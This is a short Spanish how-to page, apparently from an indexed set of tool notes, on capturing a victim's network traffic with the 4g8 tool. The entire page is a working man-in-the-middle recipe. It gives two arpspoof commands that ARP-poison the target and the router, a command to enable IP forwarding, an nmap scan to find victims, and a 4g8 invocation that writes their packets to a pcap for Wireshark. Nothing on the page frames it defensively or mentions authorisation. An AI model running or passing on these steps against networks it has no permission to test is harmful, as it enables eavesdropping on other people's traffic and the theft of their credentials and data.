Volver al índice


4g8

Capturar paquetes de equipos de una red. Previamente preparar el equipo con los pasos previos para el envenenamiento arp lanzando en dos terminales y sin cerrarlas hasta terminar la captura:

# arpspoof -i eth0 -t 192.168.1.12 192.168.1.1

# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12

El “12” el sniffado, el "1" el router y el -i … la red. El paquete que contiene arpspoof es dsniff. Activar forwarding para que los paquetes vayan a su verdadero dueño:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Para conocer los parámetros [ips y MACs] que luego tendremos que entrar en 4g8 lanzar:

# nmap 192.168.1.0/24

Para conocer los equipos de la red. Una vez escogida la victima, lanzar 4g8:

# 4g8 -i eth0 -g 192.168.1.1 -G 64:69:0C:87:A8:DC -s 192.168.1.12 -S 00:19:01:54:F5:1F -w dump.pcap

-g (ip del router)

-G (MAC del router)

-s (ip de la victima)

-S (MAC de la victima)

-w (archivo donde guardar las capturas)

Para el análisis del archivo dump.pcap se puede usar wireshark entre otros.


Volver al índice